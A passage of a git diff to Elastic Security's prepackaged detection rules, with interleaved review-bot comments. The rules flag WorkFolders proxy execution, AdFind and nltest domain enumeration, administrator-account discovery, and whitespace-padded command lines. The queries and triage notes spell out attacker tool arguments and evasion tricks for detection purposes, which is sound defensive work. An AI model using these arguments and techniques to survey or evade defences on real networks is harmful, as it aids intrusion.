- "note": "## Triage and analysis\n\n- Analyze the command line of the process in question for evidence of malicious code execution.\n- Review the ancestor and child processes spawned by the process in question for indicators of further malicious code execution.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and\n process.command_line regex \".*[ ]{20,}.*\" or \n \n /* this will match on 3 or more separate occurrences of 3+ contiguous whitespace characters */\n process.command_line regex \"([^ ]+[ ]{3,}[^ ]*){3,}.*\"\n",
- "references": [
- "https://twitter.com/JohnLaTwC/status/1419251082736201737"
- ],
- "risk_score": 47,
- "rule_id": "e0dacebe-4311-4d50-9387-b17e89c2e7fd",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Host",
- "Windows",
- "Threat Detection",
- "Defense Evasion"
- ],
- "threat": [
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0005",
- "name": "Defense Evasion",
- "reference": "https://attack.mitre.org/tactics/TA0005/"
- },
- "technique": []
- }
- ],
- "timestamp_override": "event.ingested",
- "type": "eql",
- "version": 9
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json
index 392fd07b55112..2921592b61423 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json
@@ -12,15 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Signed Proxy Execution via MS Work Folders", - "note": "## Triage and analysis\n\n### Investigating Signed Proxy Execution via MS Work Folders\n\nWork Folders is a role service for file servers running Windows Server that provides a consistent way for users to access\ntheir work files from their PCs and devices. This allows users to store work files and access them from anywhere. When\ncalled, Work Folders will automatically execute any Portable Executable (PE) named control.exe as an argument before\naccessing the synced share.\n\nUsing Work Folders to execute a masqueraded control.exe could allow an adversary to bypass application controls and\nincrease privileges.\n \n#### Possible investigation steps\n\n- Investigate the process tree starting with parent process WorkFolders.exe and child process control.exe to determine\nif other child processes spawned during execution.\n- Trace the activity related to the control.exe binary to identify any continuing intrusion activity on the host.\n- Examine the location of the WorkFolders.exe binary to determine if it was copied to the location of the control.exe\nbinary. 
It resides in the System32 directory by default.\n- Review the control.exe binary executed with Work Folders to determine maliciousness such as additional host activity\nor network traffic.\n- Determine if control.exe was synced to sync share, indicating potential lateral movement.\n- Review how control.exe was originally delivered on the host, such as emailed, downloaded from the web, or written to\ndisk from a separate binary.\n \n### False positive analysis \n\n- Windows Work Folders are used legitimately by end users and administrators for file sharing and syncing but not in the\ninstance where a suspicious control.exe is passed as an argument.\n\n### Response and remediation \n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Review the Work Folders synced share to determine if the control.exe was shared and if so remove it.\n- If no lateral movement was identified during investigation, take the affected host offline if possible and remove the\ncontrol.exe binary as well as any additional artifacts identified during investigation.\n- Review integrating Windows Information Protection (WIP) to enforce data protection by encrypting the data on PCs using\nWork Folders.\n- Confirm with the user whether this was expected or not, and reset their password.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Signed Proxy Execution via MS Work Folders\n\nWork Folders is a role service for file servers running Windows Server that provides a consistent way for users to access\ntheir work files from their PCs and devices. 
This allows users to store work files and access them from anywhere. When\ncalled, Work Folders will automatically execute any Portable Executable (PE) named control.exe as an argument before\naccessing the synced share.\n\nUsing Work Folders to execute a masqueraded control.exe could allow an adversary to bypass application controls and\nincrease privileges.\n\n#### Possible investigation steps\n\n- Investigate the process tree starting with parent process WorkFolders.exe and child process control.exe to determine\nif other child processes spawned during execution.\n- Trace the activity related to the control.exe binary to identify any continuing intrusion activity on the host.\n- Examine the location of the WorkFolders.exe binary to determine if it was copied to the location of the control.exe\nbinary. It resides in the System32 directory by default.\n- Review the control.exe binary executed with Work Folders to determine maliciousness such as additional host activity\nor network traffic.\n- Determine if control.exe was synced to sync share, indicating potential lateral movement.\n- Review how control.exe was originally delivered on the host, such as emailed, downloaded from the web, or written to\ndisk from a separate binary.\n\n### False positive analysis\n\n- Windows Work Folders are used legitimately by end users and administrators for file sharing and syncing but not in the\ninstance where a suspicious control.exe is passed as an argument.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Review the Work Folders synced share to determine if the control.exe was shared and if so remove it.\n- If no lateral movement was identified during investigation, take the affected host offline if possible and remove the\ncontrol.exe binary as well as any additional artifacts identified during investigation.\n- Review integrating 
Windows Information Protection (WIP) to enforce data protection by encrypting the data on PCs using\nWork Folders.\n- Confirm with the user whether this was expected or not, and reset their password.", "query": "process where event.type in (\"start\",\"process_started\")\n and process.name : \"control.exe\" and process.parent.name : \"WorkFolders.exe\"\n and not process.executable : (\"?:\\\\Windows\\\\System32\\\\control.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\control.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/storage/work-folders/work-folders-overview", "https://twitter.com/ElliotKillick/status/1449812843772227588", "https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -40,7 +63,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] @@ -48,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json
index e8f31c677cfc7..5b57b1323de8a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "AdFind Command Activity", - "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information\nfrom Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same\nways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects\nand understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of\nthis tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. 
It doesn't happen in\nisolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n (process.name : \"AdFind.exe\" or process.pe.original_file_name == \"AdFind.exe\") and \n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\", \n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\", \n 
\"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", + "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information\nfrom Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same\nways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects\nand understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of\nthis tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. 
It doesn't happen in\nisolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"AdFind.exe\" or process.pe.original_file_name == \"AdFind.exe\") and\n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\",\n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\",\n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", "references": [ "http://www.joeware.net/freetools/tools/adfind/", 
"https://thedfirreport.com/2020/05/08/adfind-recon/", @@ -22,8 +22,31 @@ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -80,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json index 5744f96fb3469..70210662313d5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json 
@@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Administrator Accounts", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups \nin the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such\nas mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups\nin the domain and local machine scope. 
Attackers can use this information to plan their next steps of the attack, such\nas mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).",
 "query": "process where event.type in (\"start\", \"process_started\") and\n (((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : (\"group\", \"user\", \"localgroup\") and\n process.args : (\"admin\", \"Domain Admins\", \"Remote Desktop Users\", \"Enterprise Admins\", \"Organization Management\") and\n not process.args : \"/add\")\n\n or\n\n ((process.name : \"wmic.exe\" or process.pe.original_file_name == \"wmic.exe\") and\n process.args : (\"group\", \"useraccount\"))\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "871ea072-1b71-4def-b016-6278b505138d",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -55,5 +83,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json
index ed50b58a91e13..68d7eb43809e7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json
@@ -14,13 +14,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Blob Container Access Level Modification",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE\" and event.outcome:(Success or success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "2636aa6c-88b5-4337-9c31-8d0192a8ef45",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -64,5 +89,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
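Review bot: Emptying `"note"` leaves the analyst with no hint that the query fires on every successful `MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE` operation — presumably any container create or property update — while the rule name promises access-level modification specifically; the old Config text only moved to `setup`, so no triage guidance ever existed here. Rather than `"note": ""`, I would carry a short note such as `## Triage and analysis\n\nThis rule matches any successful container write. Confirm from the activity log entry that the container's public access level actually changed before escalating.` The `related_integrations` pin to azure `0.12.0` reads as a minimum compatible version; if it is merely the current one, a one-line comment in the PR or a docs note should say which, since there is no way to tell from the JSON.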
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json
index e3455e2d3490c..270d3f75e74f2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json
@@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Account Discovery Command via SYSTEM Account", - "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed\nafter attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike,\n investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential\n webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system\nshell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.name : \"whoami.exe\" or\n (process.name : \"net1.exe\" and not process.parent.name : \"net.exe\"))\n", + "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network 
resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed\nafter attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike,\n investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential\n webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system\nshell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.name : \"whoami.exe\" or\n (process.name : \"net1.exe\" and not process.parent.name : \"net.exe\"))\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "process.Ext.token.integrity_level_name",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "winlog.event_data.IntegrityLevel",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -43,5 +71,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 12
+ "version": 14
 }
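Review bot: `required_fields` declares `process.Ext.token.integrity_level_name` with `"type": "unknown"`, yet the query matches it as a string with `:` exactly like `winlog.event_data.IntegrityLevel`, which the same list declares as `keyword`; if the Endpoint package maps this field as keyword (I cannot confirm that from here), the entry should read `"type": "keyword"`, otherwise anything that validates index mappings from `required_fields` cannot check it. It would also help the analyst if the triage note said that "SYSTEM account" is inferred from a `System` integrity level on either of the two `?`-prefixed fields, not from `user.name`, so the actual account on the event should be confirmed before it is treated as SYSTEM. The `"note"` change itself is whitespace-only and needs no further review.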
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_enumerating_domain_trusts_via_nltest.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_enumerating_domain_trusts_via_nltest.json
new file mode 100644
index 0000000000000..777281ef1a4cd
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_enumerating_domain_trusts_via_nltest.json
@@ -0,0 +1,72 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the use of nltest.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate domain trusts and gain insight into trust relationships, as well as the state of Domain Controller (DC) replication in a Microsoft Windows NT Domain.",
+ "false_positives": [
+ "Domain administrators may use this command-line utility for legitimate information gathering purposes, but it is not common for environments with Windows Server 2012 and newer."
+ ],
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Enumerating Domain Trusts via NLTEST.EXE",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"nltest.exe\" and process.args : (\n \"/DCLIST:*\", \"/DCNAME:*\", \"/DSGET*\",\n \"/LSAQUERYFTI:*\", \"/PARENTDOMAIN\",\n \"/DOMAIN_TRUSTS\", \"/BDC_QUERY:*\")\n",
+ "references": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/"
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 23,
